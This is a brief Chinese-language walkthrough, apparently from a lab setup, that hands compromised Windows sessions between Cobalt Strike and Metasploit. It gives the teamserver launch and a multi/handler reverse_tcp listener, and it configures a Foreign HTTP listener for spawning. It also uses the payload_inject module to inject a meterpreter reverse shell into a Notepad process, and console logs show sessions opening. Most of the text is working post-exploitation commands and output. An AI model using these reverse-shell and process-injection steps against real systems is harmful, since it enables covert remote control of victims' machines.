cs传递到msf

1，先启动cs

┌──(root㉿ring04h)-[~/cobalt_strike_4.7]
└─# ./teamserver 192.168.196.144 123456
​
┌──(root㉿ring04h)-[~/cobalt_strike_4.7]
└─# ./start.sh
​

2，上传木马，上线主机

3，msf配置一个反向连接的tcp监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.196.144
lhost => 192.168.196.144
msf6 exploit(multi/handler) > set lport 12345
lport => 12345
msf6 exploit(multi/handler) > exploit 

4，cs配置一个Foreign HTTP监听器

host，port就配置msf所在主机ip，端口就行

5，选择spawn(权力委派的意思)进行转移，然后选中Foreign HTTP监听器就行了

6，msf结果

msf6 exploit(multi/handler) > exploit 
​
[*] Started reverse TCP handler on 192.168.196.144:12345 
[*] Sending stage (176198 bytes) to 192.168.196.10
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.196.10 - Meterpreter session 3 closed.
[*] Sending stage (176198 bytes) to 192.168.196.10
[*] Meterpreter session 4 opened (192.168.196.144:12345 -> 192.168.196.10:60922) at 2024-05-28 23:31:51 -0400
​
meterpreter > ipconfig

msf传递到cs

1，上传木马，上线主机

2，在cs中添加一个监听器

3，在msf中配置

msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.196.144 //cs的ip
lhost => 192.168.196.144
msf6 exploit(windows/local/payload_inject) > set lport 3333  //cs的端口
lport => 3333
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true 
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set prependmigrate true 
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > exploit 
​
[*] Running module against DCTEST
[*] Spawned Notepad process 1352
[*] Injecting payload into 1352
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 1352

4，成功